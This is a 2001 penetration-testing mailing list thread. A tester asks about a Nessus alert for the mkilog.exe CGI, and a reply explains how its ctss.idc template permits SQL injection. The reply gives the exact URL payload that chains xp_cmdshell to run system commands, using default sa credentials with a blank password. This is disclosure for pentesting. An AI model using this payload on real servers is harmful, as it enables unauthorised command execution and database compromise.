Penetration Testing mailing list archives

Re: Information about /scripts/toos/mkilog.exe

From: H D Moore <hdm () secureaustin com>
Date: Tue, 31 Jul 2001 12:50:23 -0500

mkilog.exe simply posts data to ctss.idc, which creates  a table based on the 
parameters it gets:

[ctss.idc]
Datasource: %ds%
Username: %user%
Password: %pwd%
Template: ct.htx
SQLStatement:
+create table %table% (
+ClientHost varchar(50), username varchar(50),
+LogTime datetime, service varchar( 20), machine varchar( 20),
+serverip varchar( 50), processingtime int, bytesrecvd int,
+bytessent int, servicestatus int, win32status int,
+operation varchar( 200), target varchar(200), parameters text )

If you pass a correct DataSource, User, and Password (LocalServer, sa, blank 
password for locally installed servers), then change the table to:

bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

You can use it to run system commands.  In this case, the actual query you 
would send is (lines probably wrapped):

/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh 
int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

For every query you run you have to create another garbage table, so remeber 
to cleanup all those bogus tables when you are done.

For some reason SQL Server 6.5 limits your command parameter to 30 characters 
when executed this way (which is _really_ annoying), I haven't been able to 
track down why yet.  Goodluck!

-HD

http://www.digitaloffense.net (play)
http://www.digitaldefense.net (work)


On Tuesday 31 July 2001 06:48 am, César González wrote:

Hello all,

I am making a penetration testing, and some vulnerability scanners alert
about the script mkilog.exe. Most exactly nessus said the following :

    The CGI /scripts/tools/mkilog.exe is present.

    This CGI allows an attacker to view and modify SQL database
    contents.

No securityfocus links, CVE advisory, etc. i have search most popular
security search engines but nothing appears. Any help will be appreciated.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Information about /scripts/toos/mkilog.exe César González (Jul 31)
- Re: Information about /scripts/toos/mkilog.exe H D Moore (Jul 31)